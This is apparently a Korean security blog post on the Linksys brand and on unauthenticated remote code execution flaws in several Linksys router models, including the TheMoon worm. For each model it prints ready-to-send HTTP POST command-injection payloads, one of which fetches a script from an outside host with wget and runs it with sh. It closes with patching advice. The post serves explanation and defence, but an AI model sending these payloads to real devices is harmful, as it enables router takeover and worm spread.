Intro
링크시스(Linksys)란?
벨킨이 현재 생산하고 있는 가정 및 소규모 오피스 네트워크 제품의 브랜드 이름입니다.
Summary
본래 1995년에 설립한 별개의 기업이었으나, 2003년에 시스코 시스템즈에 인수되었고 이후, 2013년 5월에 벨킨에 인수되었습니다.
[Linksys 라우터, 스위치, WiFi 제품]
제품들은 과거부터 현재까지 브로드밴드 및 무선 라우터, 소비자 및 소규모 비즈니스 이더넷 스위치, VoIP 장비, 무선 인터넷 비디오 카메라, AV 제품, 네트워크 스토리지 시스템 등의 제품으로 분류되어 판매되고 있습니다.
Explanation
Linksys E-series devices
1. Bypass URL
POST/tmBlock.cgi HTTP/1.1
현 취약점은 LinkSys의 인증되지 않은 원격 코드 실행에 대한 악용 취약점입니다. TheMoon 웜에 의해 악용되어 발생하며, 해당 웜은 2009년 영화 "The Moon"의 가상 회사인 Lunar Industries의 로고가 포함되어 있기 때문에 TheMoon 이라 불리게 되었습니다.
웜은 라우터의 모델 및 펌웨어 버전을 식별하기 위해 HNAP 요청을 보내며, 장치가 취약한 것으로 판단되면 장치에서 로컬 명령을 실행할 수 있도록 특정 CGI 스크립트에 다른 요청을 보냅니다. 그리고 임의의 'admin' 자격증명을 보내지만 ,스크립트에 의해 검사되지 않게됩니다.
2. PayLoad
POST /tmBlock.cgi HTTP/1.1
Authorization: Basic YWRtaW46cG9ybmh1Yg==
Content-Type: application/x-www-form-urlencoded
Content-Length: 215
submit_button=&change_action=&action=&commit=0&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `wget%20http://l.ocalhost.host/lsys.sh%20-O%20-%3E%20/tmp/nemp;sh%20/tmp/nemp`&StartEPI=1
웜은 해당 취약점을 악용하여 MIPS 플랫폼 용으로 컴파일 된 ELF(실행 가능 및 링크 가능) 형식의 바이너리 파일을 다운로드하고 실행합니다. 그리고 새로운 라우터에서 실행될 때, 이 바이너리는 감염시킬 새로운 장치를 검색하기 시작합니다.
또한 임의의 번호가 낮은 임의의 포트에 HTTP 서버를 열고 이를 사용하여 새로 식별된 대상에 자체 복사본을 제공하게 됩니다.
*추가
/tmBlock.cgi, /tmUnblock.cgi, /hndBlock.cgi, /hndUnblock.cgi
Linksys WAP54G Wireless Access Points
1. Bypass URL
POST /debug.cgi HTTP/1.1
2. PayLoad
POST /debug.cgi HTTP/1.1
Host: [IP]:[Port]
Content-Length: 1024
Connection: keep-alive
Authorization: Basic R2VtdGVrOmdlbXRla3N3ZA
data1=;%s+wap54gv3%d;&command=ui_debug
Linksys WRT100, WRT110 consumer routers
1. Bypass URL
POST /ping.cgi HTTP/1.1
2. PayLoad
POST /ping.cgi HTTP/1.1
Host: [IP]:[Port]
Content-Length: 1024
Connection: keep-alive
Authorization: Basic YWRtaW46YWRtaW4
pingstr=&+;%s+wrt100_p%d;
Linksys E1500/E2500 routers
1. Bypass URL
POST /apply.cgi HTTP/1.1
2. PayLoad
POST /apply.cgi HTTP/1.1
Host: [IP]:[Port]
Content-Length: 1024
Connection: keep-alive
Authorization: Basic YWRtaW46YWRtaW4
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=127.0.0.1&ping_size=&;%s+e1500_p%d;&ping_times=5&traceroute_ip=127.0.0.1
[Shodan LinkSys 검색결과]
쇼단을 통한 검색결과, 전 세계적으로 많은 국가에서 사용 중이며, 취약점에 대비해야 합니다.
3. 취약한 버젼
- E4200 E3200 E3000 E2500 E2100L E2000 E1550 E1500 E1200 E1000 E900 E300
- WAG320N
- WAP300N WAP610N
- WES610N
- WET610N
- WRT610N WRT600N WRT400N WRT320N WRT160N WRT150N
※ 해결방안
1. 공격자가 접근하지 못하도록 펌웨어를 업데이트하는 것을 권고드립니다.
https://linksys-sh.com/ea7500/firmware-update/
Firmware Update
linksys-sh.com
2. 복잡한 로그인 암호를 사용하여 무차별적인 공격을 방지하는 것이 좋습니다.
참고사항
1. https://unit42.paloaltonetworks.com/
Unit 42 - Latest Cyber Security Research | Palo Alto Networks
This post is also available in: 日本語 (Japanese)
unit42.paloaltonetworks.com
